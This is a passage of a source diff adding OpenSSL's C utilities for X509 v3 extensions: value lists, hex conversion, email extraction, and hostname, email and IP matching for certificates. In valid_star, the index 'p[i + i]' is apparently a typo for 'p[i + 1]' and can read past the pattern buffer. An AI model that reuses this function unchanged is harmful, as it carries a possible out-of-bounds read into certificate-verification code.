+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* X509 v3 extension utilities */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+#include <openssl/bn.h>
+
+static char *strip_spaces(char *name);
+static int sk_strcmp(const char *const *a, const char *const *b);
+static STACK_OF(OPENSSL_STRING) *get_email(X509_NAME *name,
+                                           GENERAL_NAMES *gens);
+static void str_free(OPENSSL_STRING str);
+static int append_ia5(STACK_OF(OPENSSL_STRING) **sk, ASN1_IA5STRING *email);
+
+static int ipv4_from_asc(unsigned char *v4, const char *in);
+static int ipv6_from_asc(unsigned char *v6, const char *in);
+static int ipv6_cb(const char *elem, int len, void *usr);
+static int ipv6_hex(unsigned char *out, const char *in, int inlen);
+
+/* Add a CONF_VALUE name value pair to stack */
+
+int X509V3_add_value(const char *name, const char *value,
+                     STACK_OF(CONF_VALUE) **extlist)
+{
+    CONF_VALUE *vtmp = NULL;
+    char *tname = NULL, *tvalue = NULL;
+    if (name && !(tname = BUF_strdup(name)))
+        goto err;
+    if (value && !(tvalue = BUF_strdup(value)))
+        goto err;
+    if (!(vtmp = (CONF_VALUE *)OPENSSL_malloc(sizeof(CONF_VALUE))))
+        goto err;
+    if (!*extlist && !(*extlist = sk_CONF_VALUE_new_null()))
+        goto err;
+    vtmp->section = NULL;
+    vtmp->name = tname;
+    vtmp->value = tvalue;
+    if (!sk_CONF_VALUE_push(*extlist, vtmp))
+        goto err;
+    return 1;
+ err:
+    X509V3err(X509V3_F_X509V3_ADD_VALUE, ERR_R_MALLOC_FAILURE);
+    if (vtmp)
+        OPENSSL_free(vtmp);
+    if (tname)
+        OPENSSL_free(tname);
+    if (tvalue)
+        OPENSSL_free(tvalue);
+    return 0;
+}
+
+int X509V3_add_value_uchar(const char *name, const unsigned char *value,
+                           STACK_OF(CONF_VALUE) **extlist)
+{
+    return X509V3_add_value(name, (const char *)value, extlist);
+}
+
+/* Free function for STACK_OF(CONF_VALUE) */
+
+void X509V3_conf_free(CONF_VALUE *conf)
+{
+    if (!conf)
+        return;
+    if (conf->name)
+        OPENSSL_free(conf->name);
+    if (conf->value)
+        OPENSSL_free(conf->value);
+    if (conf->section)
+        OPENSSL_free(conf->section);
+    OPENSSL_free(conf);
+}
+
+int X509V3_add_value_bool(const char *name, int asn1_bool,
+                          STACK_OF(CONF_VALUE) **extlist)
+{
+    if (asn1_bool)
+        return X509V3_add_value(name, "TRUE", extlist);
+    return X509V3_add_value(name, "FALSE", extlist);
+}
+
+int X509V3_add_value_bool_nf(char *name, int asn1_bool,
+                             STACK_OF(CONF_VALUE) **extlist)
+{
+    if (asn1_bool)
+        return X509V3_add_value(name, "TRUE", extlist);
+    return 1;
+}
+
+char *i2s_ASN1_ENUMERATED(X509V3_EXT_METHOD *method, ASN1_ENUMERATED *a)
+{
+    BIGNUM *bntmp = NULL;
+    char *strtmp = NULL;
+    if (!a)
+        return NULL;
+    if (!(bntmp = ASN1_ENUMERATED_to_BN(a, NULL)) ||
+        !(strtmp = BN_bn2dec(bntmp)))
+        X509V3err(X509V3_F_I2S_ASN1_ENUMERATED, ERR_R_MALLOC_FAILURE);
+    BN_free(bntmp);
+    return strtmp;
+}
+
+char *i2s_ASN1_INTEGER(X509V3_EXT_METHOD *method, ASN1_INTEGER *a)
+{
+    BIGNUM *bntmp = NULL;
+    char *strtmp = NULL;
+    if (!a)
+        return NULL;
+    if (!(bntmp = ASN1_INTEGER_to_BN(a, NULL)) ||
+        !(strtmp = BN_bn2dec(bntmp)))
+        X509V3err(X509V3_F_I2S_ASN1_INTEGER, ERR_R_MALLOC_FAILURE);
+    BN_free(bntmp);
+    return strtmp;
+}
+
+ASN1_INTEGER *s2i_ASN1_INTEGER(X509V3_EXT_METHOD *method, char *value)
+{
+    BIGNUM *bn = NULL;
+    ASN1_INTEGER *aint;
+    int isneg, ishex;
+    int ret;
+    if (!value) {
+        X509V3err(X509V3_F_S2I_ASN1_INTEGER, X509V3_R_INVALID_NULL_VALUE);
+        return 0;
+    }
+    bn = BN_new();
+    if (value[0] == '-') {
+        value++;
+        isneg = 1;
+    } else
+        isneg = 0;
+
+    if (value[0] == '0' && ((value[1] == 'x') || (value[1] == 'X'))) {
+        value += 2;
+        ishex = 1;
+    } else
+        ishex = 0;
+
+    if (ishex)
+        ret = BN_hex2bn(&bn, value);
+    else
+        ret = BN_dec2bn(&bn, value);
+
+    if (!ret || value[ret]) {
+        BN_free(bn);
+        X509V3err(X509V3_F_S2I_ASN1_INTEGER, X509V3_R_BN_DEC2BN_ERROR);
+        return 0;
+    }
+
+    if (isneg && BN_is_zero(bn))
+        isneg = 0;
+
+    aint = BN_to_ASN1_INTEGER(bn, NULL);
+    BN_free(bn);
+    if (!aint) {
+        X509V3err(X509V3_F_S2I_ASN1_INTEGER,
+                  X509V3_R_BN_TO_ASN1_INTEGER_ERROR);
+        return 0;
+    }
+    if (isneg)
+        aint->type |= V_ASN1_NEG;
+    return aint;
+}
+
+int X509V3_add_value_int(const char *name, ASN1_INTEGER *aint,
+                         STACK_OF(CONF_VALUE) **extlist)
+{
+    char *strtmp;
+    int ret;
+    if (!aint)
+        return 1;
+    if (!(strtmp = i2s_ASN1_INTEGER(NULL, aint)))
+        return 0;
+    ret = X509V3_add_value(name, strtmp, extlist);
+    OPENSSL_free(strtmp);
+    return ret;
+}
+
+int X509V3_get_value_bool(CONF_VALUE *value, int *asn1_bool)
+{
+    char *btmp;
+    if (!(btmp = value->value))
+        goto err;
+    if (!strcmp(btmp, "TRUE") || !strcmp(btmp, "true")
+        || !strcmp(btmp, "Y") || !strcmp(btmp, "y")
+        || !strcmp(btmp, "YES") || !strcmp(btmp, "yes")) {
+        *asn1_bool = 0xff;
+        return 1;
+    } else if (!strcmp(btmp, "FALSE") || !strcmp(btmp, "false")
+               || !strcmp(btmp, "N") || !strcmp(btmp, "n")
+               || !strcmp(btmp, "NO") || !strcmp(btmp, "no")) {
+        *asn1_bool = 0;
+        return 1;
+    }
+ err:
+    X509V3err(X509V3_F_X509V3_GET_VALUE_BOOL,
+              X509V3_R_INVALID_BOOLEAN_STRING);
+    X509V3_conf_err(value);
+    return 0;
+}
+
+int X509V3_get_value_int(CONF_VALUE *value, ASN1_INTEGER **aint)
+{
+    ASN1_INTEGER *itmp;
+    if (!(itmp = s2i_ASN1_INTEGER(NULL, value->value))) {
+        X509V3_conf_err(value);
+        return 0;
+    }
+    *aint = itmp;
+    return 1;
+}
+
+#define HDR_NAME        1
+#define HDR_VALUE       2
+
+/*
+ * #define DEBUG
+ */
+
+STACK_OF(CONF_VALUE) *X509V3_parse_list(const char *line)
+{
+    char *p, *q, c;
+    char *ntmp, *vtmp;
+    STACK_OF(CONF_VALUE) *values = NULL;
+    char *linebuf;
+    int state;
+    /* We are going to modify the line so copy it first */
+    linebuf = BUF_strdup(line);
+    state = HDR_NAME;
+    ntmp = NULL;
+    /* Go through all characters */
+    for (p = linebuf, q = linebuf; (c = *p) && (c != '\r') && (c != '\n');
+         p++) {
+
+        switch (state) {
+        case HDR_NAME:
+            if (c == ':') {
+                state = HDR_VALUE;
+                *p = 0;
+                ntmp = strip_spaces(q);
+                if (!ntmp) {
+                    X509V3err(X509V3_F_X509V3_PARSE_LIST,
+                              X509V3_R_INVALID_NULL_NAME);
+                    goto err;
+                }
+                q = p + 1;
+            } else if (c == ',') {
+                *p = 0;
+                ntmp = strip_spaces(q);
+                q = p + 1;
+#if 0
+                printf("%s\n", ntmp);
+#endif
+                if (!ntmp) {
+                    X509V3err(X509V3_F_X509V3_PARSE_LIST,
+                              X509V3_R_INVALID_NULL_NAME);
+                    goto err;
+                }
+                X509V3_add_value(ntmp, NULL, &values);
+            }
+            break;
+
+        case HDR_VALUE:
+            if (c == ',') {
+                state = HDR_NAME;
+                *p = 0;
+                vtmp = strip_spaces(q);
+#if 0
+                printf("%s\n", ntmp);
+#endif
+                if (!vtmp) {
+                    X509V3err(X509V3_F_X509V3_PARSE_LIST,
+                              X509V3_R_INVALID_NULL_VALUE);
+                    goto err;
+                }
+                X509V3_add_value(ntmp, vtmp, &values);
+                ntmp = NULL;
+                q = p + 1;
+            }
+
+        }
+    }
+
+    if (state == HDR_VALUE) {
+        vtmp = strip_spaces(q);
+#if 0
+        printf("%s=%s\n", ntmp, vtmp);
+#endif
+        if (!vtmp) {
+            X509V3err(X509V3_F_X509V3_PARSE_LIST,
+                      X509V3_R_INVALID_NULL_VALUE);
+            goto err;
+        }
+        X509V3_add_value(ntmp, vtmp, &values);
+    } else {
+        ntmp = strip_spaces(q);
+#if 0
+        printf("%s\n", ntmp);
+#endif
+        if (!ntmp) {
+            X509V3err(X509V3_F_X509V3_PARSE_LIST, X509V3_R_INVALID_NULL_NAME);
+            goto err;
+        }
+        X509V3_add_value(ntmp, NULL, &values);
+    }
+    OPENSSL_free(linebuf);
+    return values;
+
+ err:
+    OPENSSL_free(linebuf);
+    sk_CONF_VALUE_pop_free(values, X509V3_conf_free);
+    return NULL;
+
+}
+
+/* Delete leading and trailing spaces from a string */
+static char *strip_spaces(char *name)
+{
+    char *p, *q;
+    /* Skip over leading spaces */
+    p = name;
+    while (*p && isspace((unsigned char)*p))
+        p++;
+    if (!*p)
+        return NULL;
+    q = p + strlen(p) - 1;
+    while ((q != p) && isspace((unsigned char)*q))
+        q--;
+    if (p != q)
+        q[1] = 0;
+    if (!*p)
+        return NULL;
+    return p;
+}
+
+/* hex string utilities */
+
+/*
+ * Given a buffer of length 'len' return a OPENSSL_malloc'ed string with its
+ * hex representation @@@ (Contents of buffer are always kept in ASCII, also
+ * on EBCDIC machines)
+ */
+
+char *hex_to_string(const unsigned char *buffer, long len)
+{
+    char *tmp, *q;
+    const unsigned char *p;
+    int i;
+    const static char hexdig[] = "0123456789ABCDEF";
+    if (!buffer || !len)
+        return NULL;
+    if (!(tmp = OPENSSL_malloc(len * 3 + 1))) {
+        X509V3err(X509V3_F_HEX_TO_STRING, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    q = tmp;
+    for (i = 0, p = buffer; i < len; i++, p++) {
+        *q++ = hexdig[(*p >> 4) & 0xf];
+        *q++ = hexdig[*p & 0xf];
+        *q++ = ':';
+    }
+    q[-1] = 0;
+#ifdef CHARSET_EBCDIC
+    ebcdic2ascii(tmp, tmp, q - tmp - 1);
+#endif
+
+    return tmp;
+}
+
+/*
+ * Give a string of hex digits convert to a buffer
+ */
+
+unsigned char *string_to_hex(const char *str, long *len)
+{
+    unsigned char *hexbuf, *q;
+    unsigned char ch, cl, *p;
+    if (!str) {
+        X509V3err(X509V3_F_STRING_TO_HEX, X509V3_R_INVALID_NULL_ARGUMENT);
+        return NULL;
+    }
+    if (!(hexbuf = OPENSSL_malloc(strlen(str) >> 1)))
+        goto err;
+    for (p = (unsigned char *)str, q = hexbuf; *p;) {
+        ch = *p++;
+#ifdef CHARSET_EBCDIC
+        ch = os_toebcdic[ch];
+#endif
+        if (ch == ':')
+            continue;
+        cl = *p++;
+#ifdef CHARSET_EBCDIC
+        cl = os_toebcdic[cl];
+#endif
+        if (!cl) {
+            X509V3err(X509V3_F_STRING_TO_HEX, X509V3_R_ODD_NUMBER_OF_DIGITS);
+            OPENSSL_free(hexbuf);
+            return NULL;
+        }
+        if (isupper(ch))
+            ch = tolower(ch);
+        if (isupper(cl))
+            cl = tolower(cl);
+
+        if ((ch >= '0') && (ch <= '9'))
+            ch -= '0';
+        else if ((ch >= 'a') && (ch <= 'f'))
+            ch -= 'a' - 10;
+        else
+            goto badhex;
+
+        if ((cl >= '0') && (cl <= '9'))
+            cl -= '0';
+        else if ((cl >= 'a') && (cl <= 'f'))
+            cl -= 'a' - 10;
+        else
+            goto badhex;
+
+        *q++ = (ch << 4) | cl;
+    }
+
+    if (len)
+        *len = q - hexbuf;
+
+    return hexbuf;
+
+ err:
+    if (hexbuf)
+        OPENSSL_free(hexbuf);
+    X509V3err(X509V3_F_STRING_TO_HEX, ERR_R_MALLOC_FAILURE);
+    return NULL;
+
+ badhex:
+    OPENSSL_free(hexbuf);
+    X509V3err(X509V3_F_STRING_TO_HEX, X509V3_R_ILLEGAL_HEX_DIGIT);
+    return NULL;
+
+}
+
+/*
+ * V2I name comparison function: returns zero if 'name' matches cmp or cmp.*
+ */
+
+int name_cmp(const char *name, const char *cmp)
+{
+    int len, ret;
+    char c;
+    len = strlen(cmp);
+    if ((ret = strncmp(name, cmp, len)))
+        return ret;
+    c = name[len];
+    if (!c || (c == '.'))
+        return 0;
+    return 1;
+}
+
+static int sk_strcmp(const char *const *a, const char *const *b)
+{
+    return strcmp(*a, *b);
+}
+
+STACK_OF(OPENSSL_STRING) *X509_get1_email(X509 *x)
+{
+    GENERAL_NAMES *gens;
+    STACK_OF(OPENSSL_STRING) *ret;
+
+    gens = X509_get_ext_d2i(x, NID_subject_alt_name, NULL, NULL);
+    ret = get_email(X509_get_subject_name(x), gens);
+    sk_GENERAL_NAME_pop_free(gens, GENERAL_NAME_free);
+    return ret;
+}
+
+STACK_OF(OPENSSL_STRING) *X509_get1_ocsp(X509 *x)
+{
+    AUTHORITY_INFO_ACCESS *info;
+    STACK_OF(OPENSSL_STRING) *ret = NULL;
+    int i;
+
+    info = X509_get_ext_d2i(x, NID_info_access, NULL, NULL);
+    if (!info)
+        return NULL;
+    for (i = 0; i < sk_ACCESS_DESCRIPTION_num(info); i++) {
+        ACCESS_DESCRIPTION *ad = sk_ACCESS_DESCRIPTION_value(info, i);
+        if (OBJ_obj2nid(ad->method) == NID_ad_OCSP) {
+            if (ad->location->type == GEN_URI) {
+                if (!append_ia5
+                    (&ret, ad->location->d.uniformResourceIdentifier))
+                    break;
+            }
+        }
+    }
+    AUTHORITY_INFO_ACCESS_free(info);
+    return ret;
+}
+
+STACK_OF(OPENSSL_STRING) *X509_REQ_get1_email(X509_REQ *x)
+{
+    GENERAL_NAMES *gens;
+    STACK_OF(X509_EXTENSION) *exts;
+    STACK_OF(OPENSSL_STRING) *ret;
+
+    exts = X509_REQ_get_extensions(x);
+    gens = X509V3_get_d2i(exts, NID_subject_alt_name, NULL, NULL);
+    ret = get_email(X509_REQ_get_subject_name(x), gens);
+    sk_GENERAL_NAME_pop_free(gens, GENERAL_NAME_free);
+    sk_X509_EXTENSION_pop_free(exts, X509_EXTENSION_free);
+    return ret;
+}
+
+static STACK_OF(OPENSSL_STRING) *get_email(X509_NAME *name,
+                                           GENERAL_NAMES *gens)
+{
+    STACK_OF(OPENSSL_STRING) *ret = NULL;
+    X509_NAME_ENTRY *ne;
+    ASN1_IA5STRING *email;
+    GENERAL_NAME *gen;
+    int i;
+    /* Now add any email address(es) to STACK */
+    i = -1;
+    /* First supplied X509_NAME */
+    while ((i = X509_NAME_get_index_by_NID(name,
+                                           NID_pkcs9_emailAddress, i)) >= 0) {
+        ne = X509_NAME_get_entry(name, i);
+        email = X509_NAME_ENTRY_get_data(ne);
+        if (!append_ia5(&ret, email))
+            return NULL;
+    }
+    for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+        gen = sk_GENERAL_NAME_value(gens, i);
+        if (gen->type != GEN_EMAIL)
+            continue;
+        if (!append_ia5(&ret, gen->d.ia5))
+            return NULL;
+    }
+    return ret;
+}
+
+static void str_free(OPENSSL_STRING str)
+{
+    OPENSSL_free(str);
+}
+
+static int append_ia5(STACK_OF(OPENSSL_STRING) **sk, ASN1_IA5STRING *email)
+{
+    char *emtmp;
+    /* First some sanity checks */
+    if (email->type != V_ASN1_IA5STRING)
+        return 1;
+    if (!email->data || !email->length)
+        return 1;
+    if (!*sk)
+        *sk = sk_OPENSSL_STRING_new(sk_strcmp);
+    if (!*sk)
+        return 0;
+    /* Don't add duplicates */
+    if (sk_OPENSSL_STRING_find(*sk, (char *)email->data) != -1)
+        return 1;
+    emtmp = BUF_strdup((char *)email->data);
+    if (!emtmp || !sk_OPENSSL_STRING_push(*sk, emtmp)) {
+        X509_email_free(*sk);
+        *sk = NULL;
+        return 0;
+    }
+    return 1;
+}
+
+void X509_email_free(STACK_OF(OPENSSL_STRING) *sk)
+{
+    sk_OPENSSL_STRING_pop_free(sk, str_free);
+}
+
+typedef int (*equal_fn) (const unsigned char *pattern, size_t pattern_len,
+                         const unsigned char *subject, size_t subject_len,
+                         unsigned int flags);
+
+/* Skip pattern prefix to match "wildcard" subject */
+static void skip_prefix(const unsigned char **p, size_t *plen,
+                        const unsigned char *subject, size_t subject_len,
+                        unsigned int flags)
+{
+    const unsigned char *pattern = *p;
+    size_t pattern_len = *plen;
+
+    /*
+     * If subject starts with a leading '.' followed by more octets, and
+     * pattern is longer, compare just an equal-length suffix with the
+     * full subject (starting at the '.'), provided the prefix contains
+     * no NULs.
+     */
+    if ((flags & _X509_CHECK_FLAG_DOT_SUBDOMAINS) == 0)
+        return;
+
+    while (pattern_len > subject_len && *pattern) {
+        if ((flags & X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS) &&
+            *pattern == '.')
+            break;
+        ++pattern;
+        --pattern_len;
+    }
+
+    /* Skip if entire prefix acceptable */
+    if (pattern_len == subject_len) {
+        *p = pattern;
+        *plen = pattern_len;
+    }
+}
+
+/* Compare while ASCII ignoring case. */
+static int equal_nocase(const unsigned char *pattern, size_t pattern_len,
+                        const unsigned char *subject, size_t subject_len,
+                        unsigned int flags)
+{
+    skip_prefix(&pattern, &pattern_len, subject, subject_len, flags);
+    if (pattern_len != subject_len)
+        return 0;
+    while (pattern_len) {
+        unsigned char l = *pattern;
+        unsigned char r = *subject;
+        /* The pattern must not contain NUL characters. */
+        if (l == 0)
+            return 0;
+        if (l != r) {
+            if ('A' <= l && l <= 'Z')
+                l = (l - 'A') + 'a';
+            if ('A' <= r && r <= 'Z')
+                r = (r - 'A') + 'a';
+            if (l != r)
+                return 0;
+        }
+        ++pattern;
+        ++subject;
+        --pattern_len;
+    }
+    return 1;
+}
+
+/* Compare using memcmp. */
+static int equal_case(const unsigned char *pattern, size_t pattern_len,
+                      const unsigned char *subject, size_t subject_len,
+                      unsigned int flags)
+{
+    skip_prefix(&pattern, &pattern_len, subject, subject_len, flags);
+    if (pattern_len != subject_len)
+        return 0;
+    return !memcmp(pattern, subject, pattern_len);
+}
+
+/*
+ * RFC 5280, section 7.5, requires that only the domain is compared in a
+ * case-insensitive manner.
+ */
+static int equal_email(const unsigned char *a, size_t a_len,
+                       const unsigned char *b, size_t b_len,
+                       unsigned int unused_flags)
+{
+    size_t i = a_len;
+    if (a_len != b_len)
+        return 0;
+    /*
+     * We search backwards for the '@' character, so that we do not have to
+     * deal with quoted local-parts.  The domain part is compared in a
+     * case-insensitive manner.
+     */
+    while (i > 0) {
+        --i;
+        if (a[i] == '@' || b[i] == '@') {
+            if (!equal_nocase(a + i, a_len - i, b + i, a_len - i, 0))
+                return 0;
+            break;
+        }
+    }
+    if (i == 0)
+        i = a_len;
+    return equal_case(a, i, b, i, 0);
+}
+
+/*
+ * Compare the prefix and suffix with the subject, and check that the
+ * characters in-between are valid.
+ */
+static int wildcard_match(const unsigned char *prefix, size_t prefix_len,
+                          const unsigned char *suffix, size_t suffix_len,
+                          const unsigned char *subject, size_t subject_len,
+                          unsigned int flags)
+{
+    const unsigned char *wildcard_start;
+    const unsigned char *wildcard_end;
+    const unsigned char *p;
+    int allow_multi = 0;
+    int allow_idna = 0;
+
+    if (subject_len < prefix_len + suffix_len)
+        return 0;
+    if (!equal_nocase(prefix, prefix_len, subject, prefix_len, flags))
+        return 0;
+    wildcard_start = subject + prefix_len;
+    wildcard_end = subject + (subject_len - suffix_len);
+    if (!equal_nocase(wildcard_end, suffix_len, suffix, suffix_len, flags))
+        return 0;
+    /*
+     * If the wildcard makes up the entire first label, it must match at
+     * least one character.
+     */
+    if (prefix_len == 0 && *suffix == '.') {
+        if (wildcard_start == wildcard_end)
+            return 0;
+        allow_idna = 1;
+        if (flags & X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS)
+            allow_multi = 1;
+    }
+    /* IDNA labels cannot match partial wildcards */
+    if (!allow_idna &&
+        subject_len >= 4 && strncasecmp((char *)subject, "xn--", 4) == 0)
+        return 0;
+    /* The wildcard may match a literal '*' */
+    if (wildcard_end == wildcard_start + 1 && *wildcard_start == '*')
+        return 1;
+    /*
+     * Check that the part matched by the wildcard contains only
+     * permitted characters and only matches a single label unless
+     * allow_multi is set.
+     */
+    for (p = wildcard_start; p != wildcard_end; ++p)
+        if (!(('0' <= *p && *p <= '9') ||
+              ('A' <= *p && *p <= 'Z') ||
+              ('a' <= *p && *p <= 'z') ||
+              *p == '-' || (allow_multi && *p == '.')))
+            return 0;
+    return 1;
+}
+
+#define LABEL_START     (1 << 0)
+#define LABEL_END       (1 << 1)
+#define LABEL_HYPHEN    (1 << 2)
+#define LABEL_IDNA      (1 << 3)
+
+static const unsigned char *valid_star(const unsigned char *p, size_t len,
+                                       unsigned int flags)
+{
+    const unsigned char *star = 0;
+    size_t i;
+    int state = LABEL_START;
+    int dots = 0;
+    for (i = 0; i < len; ++i) {
+        /*
+         * Locate first and only legal wildcard, either at the start
+         * or end of a non-IDNA first and not final label.
+         */
+        if (p[i] == '*') {
+            int atstart = (state & LABEL_START);
+            int atend = (i == len - 1 || p[i + i] == '.');
+            /*-
+             * At most one wildcard per pattern.
+             * No wildcards in IDNA labels.
+             * No wildcards after the first label.
+             */
+            if (star != NULL || (state & LABEL_IDNA) != 0 || dots)
+                return NULL;
+            /* Only full-label '*.example.com' wildcards? */
+            if ((flags & X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS)
+                && (!atstart || !atend))
+                return NULL;
+            /* No 'foo*bar' wildcards */
+            if (!atstart && !atend)
+                return NULL;
+            star = &p[i];
+            state &= ~LABEL_START;
+        } else if (('a' <= p[i] && p[i] <= 'z')
+                   || ('A' <= p[i] && p[i] <= 'Z')
+                   || ('0' <= p[i] && p[i] <= '9')) {
+            if ((state & LABEL_START) != 0
+                && len - i >= 4 && strncasecmp((char *)&p[i], "xn--", 4) == 0)
+                state |= LABEL_IDNA;
+            state &= ~(LABEL_HYPHEN | LABEL_START);
+        } else if (p[i] == '.') {
+            if ((state & (LABEL_HYPHEN | LABEL_START)) != 0)
+                return NULL;
+            state = LABEL_START;
+            ++dots;
+        } else if (p[i] == '-') {
+            if ((state & LABEL_HYPHEN) != 0)
+                return NULL;
+            state |= LABEL_HYPHEN;
+        } else
+            return NULL;
+    }
+
+    /*
+     * The final label must not end in a hyphen or ".", and
+     * there must be at least two dots after the star.
+     */
+    if ((state & (LABEL_START | LABEL_HYPHEN)) != 0 || dots < 2)
+        return NULL;
+    return star;
+}
+
+/* Compare using wildcards. */
+static int equal_wildcard(const unsigned char *pattern, size_t pattern_len,
+                          const unsigned char *subject, size_t subject_len,
+                          unsigned int flags)
+{
+    const unsigned char *star = NULL;
+
+    /*
+     * Subject names starting with '.' can only match a wildcard pattern
+     * via a subject sub-domain pattern suffix match.
+     */
+    if (!(subject_len > 1 && subject[0] == '.'))
+        star = valid_star(pattern, pattern_len, flags);
+    if (star == NULL)
+        return equal_nocase(pattern, pattern_len,
+                            subject, subject_len, flags);
+    return wildcard_match(pattern, star - pattern,
+                          star + 1, (pattern + pattern_len) - star - 1,
+                          subject, subject_len, flags);
+}
+
+/*
+ * Compare an ASN1_STRING to a supplied string. If they match return 1. If
+ * cmp_type > 0 only compare if string matches the type, otherwise convert it
+ * to UTF8.
+ */
+
+static int do_check_string(ASN1_STRING *a, int cmp_type, equal_fn equal,
+                           unsigned int flags, const char *b, size_t blen,
+                           char **peername)
+{
+    int rv = 0;
+
+    if (!a->data || !a->length)
+        return 0;
+    if (cmp_type > 0) {
+        if (cmp_type != a->type)
+            return 0;
+        if (cmp_type == V_ASN1_IA5STRING)
+            rv = equal(a->data, a->length, (unsigned char *)b, blen, flags);
+        else if (a->length == (int)blen && !memcmp(a->data, b, blen))
+            rv = 1;
+        if (rv > 0 && peername)
+            *peername = BUF_strndup((char *)a->data, a->length);
+    } else {
+        int astrlen;
+        unsigned char *astr;
+        astrlen = ASN1_STRING_to_UTF8(&astr, a);
+        if (astrlen < 0)
+            return -1;
+        rv = equal(astr, astrlen, (unsigned char *)b, blen, flags);
+        if (rv > 0 && peername)
+            *peername = BUF_strndup((char *)astr, astrlen);
+        OPENSSL_free(astr);
+    }
+    return rv;
+}
+
+static int do_x509_check(X509 *x, const char *chk, size_t chklen,
+                         unsigned int flags, int check_type, char **peername)
+{
+    GENERAL_NAMES *gens = NULL;
+    X509_NAME *name = NULL;
+    int i;
+    int cnid;
+    int alt_type;
+    int san_present = 0;
+    int rv = 0;
+    equal_fn equal;
+
+    /* See below, this flag is internal-only */
+    flags &= ~_X509_CHECK_FLAG_DOT_SUBDOMAINS;
+    if (check_type == GEN_EMAIL) {
+        cnid = NID_pkcs9_emailAddress;
+        alt_type = V_ASN1_IA5STRING;
+        equal = equal_email;
+    } else if (check_type == GEN_DNS) {
+        cnid = NID_commonName;
+        /* Implicit client-side DNS sub-domain pattern */
+        if (chklen > 1 && chk[0] == '.')
+            flags |= _X509_CHECK_FLAG_DOT_SUBDOMAINS;
+        alt_type = V_ASN1_IA5STRING;
+        if (flags & X509_CHECK_FLAG_NO_WILDCARDS)
+            equal = equal_nocase;
+        else
+            equal = equal_wildcard;
+    } else {
+        cnid = 0;
+        alt_type = V_ASN1_OCTET_STRING;
+        equal = equal_case;
+    }
+
+    if (chklen == 0)
+        chklen = strlen(chk);
+
+    gens = X509_get_ext_d2i(x, NID_subject_alt_name, NULL, NULL);
+    if (gens) {
+        for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+            GENERAL_NAME *gen;
+            ASN1_STRING *cstr;
+            gen = sk_GENERAL_NAME_value(gens, i);
+            if (gen->type != check_type)
+                continue;
+            san_present = 1;
+            if (check_type == GEN_EMAIL)
+                cstr = gen->d.rfc822Name;
+            else if (check_type == GEN_DNS)
+                cstr = gen->d.dNSName;
+            else
+                cstr = gen->d.iPAddress;
+            /* Positive on success, negative on error! */
+            if ((rv = do_check_string(cstr, alt_type, equal, flags,
+                                      chk, chklen, peername)) != 0)
+                break;
+        }
+        GENERAL_NAMES_free(gens);
+        if (rv != 0)
+            return rv;
+        if (!cnid
+            || (san_present
+                && !(flags & X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT)))
+            return 0;
+    }
+    i = -1;
+    name = X509_get_subject_name(x);
+    while ((i = X509_NAME_get_index_by_NID(name, cnid, i)) >= 0) {
+        X509_NAME_ENTRY *ne;
+        ASN1_STRING *str;
+        ne = X509_NAME_get_entry(name, i);
+        str = X509_NAME_ENTRY_get_data(ne);
+        /* Positive on success, negative on error! */
+        if ((rv = do_check_string(str, -1, equal, flags,
+                                  chk, chklen, peername)) != 0)
+            return rv;
+    }
+    return 0;
+}
+
+int X509_check_host(X509 *x, const char *chk, size_t chklen,
+                    unsigned int flags, char **peername)
+{
+    if (chk == NULL)
+        return -2;
+    /*
+     * Embedded NULs are disallowed, except as the last character of a
+     * string of length 2 or more (tolerate caller including terminating
+     * NUL in string length).
+     */
+    if (chklen == 0)
+        chklen = strlen(chk);
+    else if (memchr(chk, '\0', chklen > 1 ? chklen - 1 : chklen))
+        return -2;
+    if (chklen > 1 && chk[chklen - 1] == '\0')
+        --chklen;
+    return do_x509_check(x, chk, chklen, flags, GEN_DNS, peername);
+}
+
+int X509_check_email(X509 *x, const char *chk, size_t chklen,
+                     unsigned int flags)
+{
+    if (chk == NULL)
+        return -2;
+    /*
+     * Embedded NULs are disallowed, except as the last character of a
+     * string of length 2 or more (tolerate caller including terminating
+     * NUL in string length).
+     */
+    if (chklen == 0)
+        chklen = strlen((char *)chk);
+    else if (memchr(chk, '\0', chklen > 1 ? chklen - 1 : chklen))
+        return -2;
+    if (chklen > 1 && chk[chklen - 1] == '\0')
+        --chklen;
+    return do_x509_check(x, chk, chklen, flags, GEN_EMAIL, NULL);
+}
+
+int X509_check_ip(X509 *x, const unsigned char *chk, size_t chklen,
+                  unsigned int flags)
+{
+    if (chk == NULL)
+        return -2;
+    return do_x509_check(x, (char *)chk, chklen, flags, GEN_IPADD, NULL);
+}
+
+int X509_check_ip_asc(X509 *x, const char *ipasc, unsigned int flags)
+{
+    unsigned char ipout[16];
+    size_t iplen;
+
+    if (ipasc == NULL)
+        return -2;
+    iplen = (size_t)a2i_ipadd(ipout, ipasc);
+    if (iplen == 0)
+        return -2;
+    return do_x509_check(x, (char *)ipout, iplen, flags, GEN_IPADD, NULL);
+}
+
+/*
+ * Convert IP addresses both IPv4 and IPv6 into an OCTET STRING compatible
+ * with RFC3280.
+ */
+
+ASN1_OCTET_STRING *a2i_IPADDRESS(const char *ipasc)
+{
+    unsigned char ipout[16];
+    ASN1_OCTET_STRING *ret;
+    int iplen;
+
+    /* If string contains a ':' assume IPv6 */
+
+    iplen = a2i_ipadd(ipout, ipasc);
+
+    if (!iplen)
+        return NULL;
+
+    ret = ASN1_OCTET_STRING_new();
+    if (!ret)
+        return NULL;
+    if (!ASN1_OCTET_STRING_set(ret, ipout, iplen)) {
+        ASN1_OCTET_STRING_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+ASN1_OCTET_STRING *a2i_IPADDRESS_NC(const char *ipasc)
+{
+    ASN1_OCTET_STRING *ret = NULL;
+    unsigned char ipout[32];
+    char *iptmp = NULL, *p;
+    int iplen1, iplen2;
+    p = strchr(ipasc, '/');
+    if (!p)
+        return NULL;
+    iptmp = BUF_strdup(ipasc);
+    if (!iptmp)
+        return NULL;
+    p = iptmp + (p - ipasc);
